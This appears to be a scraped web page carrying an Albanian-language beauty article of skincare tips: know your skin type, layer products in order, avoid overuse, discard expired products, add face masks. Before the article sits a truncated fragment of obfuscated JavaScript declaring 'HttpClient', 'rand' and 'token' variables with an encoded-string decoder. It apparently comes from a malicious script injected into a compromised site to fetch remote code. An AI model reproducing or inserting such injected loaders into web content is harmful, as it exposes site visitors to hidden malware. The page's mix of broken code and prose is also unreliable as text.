;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Dëshironi një lëkurë perfekte? Atëherë ndiqni këto këshilla

By

Industria e kujdesit ndaj lëkurës është e jashtëzakonshme dhe paraqet shumë dilema, prandaj jemi këtu për t’ju ndihmuar dhe për t’i kuptuar ato dilema rreth qindra mijëra produkteve inovative që lansohen për çdo javë.

Për t’ju udhëzuar drejt një lëkure perfekte dhe transformim të lëkurës, ja ca këshilla më poshtë.

Zbulojeni tipin e lëkurës tuaj:

Ta kuptoni dhe ta njihni tipin e lëkurës tuaj është gjëja më e rëndësishme që mund të bësh për lëkurën. Nëse nuk e dini apo keni informacionet e gabuara, mund ta prishni bilancin natyral të lëkurës dhe të shkaktoni irritim e inflamacion duke përdorur produktet e gabuara.

Mësoni se si t’i përdorni produktet:

Nëse nuk i aplikoni produktet e kujdesit ndaj lëkurës në rendin e duhur, mund ta preventoni absorbimin e plotë të tyre, çka do të thotë se ato s’do jenë edhe aq efektive. Më poshtë fotografia ua tregon se si aplikohet me rend çdo produkt.

Mos aplikoni shumë produkt:

Kur vjen puna te kujdesi ndaj lëkurës “MË SHUMË” nuk është një rregull i mirë. Nëse aplikoni shumë kremë hidratuese, produkti mund t’i bllokojë poret tuaja. Plus, është e kotë ta qoni dëm produktin e edhe paratë tuaja duke e ditur që lëkura nuk do ta absorbojë të tërën. Ja një figurë që ua shpjegon se sa duhet të hidhni nga secili produkt në lëkurë. (Frutat demonstrojnë sasinë)

Mos i përdorni produktet që u ka kaluar afati:

Të përdorësh produkte që u ka kaluar afati është një JOOO e madhe: Është e keqe për ju. Për fat të keq, produktet tuaja të bukurisë mbledhin baktere sidomos nëse i përdorni shpesh, dhe kjo mund të qojë në infeksione e irritim të lëkurës. Po ashtu, pas një kohe këto produkte mund të prodhojnë toksina të dëmshme që janë të rrezikshme për shëndetin tuaj e po ashtu edhe lëkurën.

Futni maskat në rutinën tuaj:

Shumica prej nesh e asocojmë një maskë fytyre me një natë vajzash. Mirëpo është e rëndësishme që maskat të inkorporohen në regjimin tuaj ditor. Specialistët e lëkurës sugjerojnë që të bëni një maskë 10-të minutëshe çdo mëngjes që ta hidratoni dhe ta zbutni lëkurën.

Artikuj të ngjashëm